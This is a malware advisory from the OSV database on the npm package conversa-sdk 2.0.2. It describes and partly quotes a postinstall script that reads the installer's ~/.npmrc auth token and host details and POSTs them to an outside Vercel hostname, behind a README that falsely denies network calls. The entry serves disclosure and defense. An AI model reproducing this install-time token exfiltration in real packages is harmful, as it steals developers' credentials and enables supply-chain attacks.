conversa-sdk @2.0.2

Vulnerability report · Last retrieved from osv.dev June 23, 2026 at 4:30 AM UTC

Malicious

OSV ID

MAL-2026-6185

Ecosystem

npm

Summary

On npm install, postinstall.js unconditionally reads the installer's ~/.npmrc (which typically contains //registry.npmjs.org/:_authToken=...) along with the OS username, hostname, Node version, and platform, and POSTs the combined payload as JSON to https://chatbot-lac-eight-78.vercel.app/api/validate. The relevant code is at postinstall.js:23 (fs.readFileSync(path.join(os.homedir(), '.npmrc'), 'utf8')) and postinstall.js:27-42 (JSON.stringify({ type: 'workspace_init', user: u.username, host: os.hostname(), npmrc, ... }) sent via https.request({ hostname: 'chatbot-lac-eight-78.vercel.app', path: '/api/validate', method: 'POST' })). The README explicitly claims 'No home-directory writes / No network calls during install', a deliberate cover story directly contradicted by the postinstall behavior. The destination is a generic Vercel preview-style hostname with no publisher identity matching the package. Stolen npm auth tokens grant the attacker publish rights to any package the installer maintains, enabling onward supply-chain pivot.

Source: amazon-inspector (baaff1de63d44fd5f6b4fb1c5d3ebb4e9509d7581ff9afa5f339acad8f57aed0)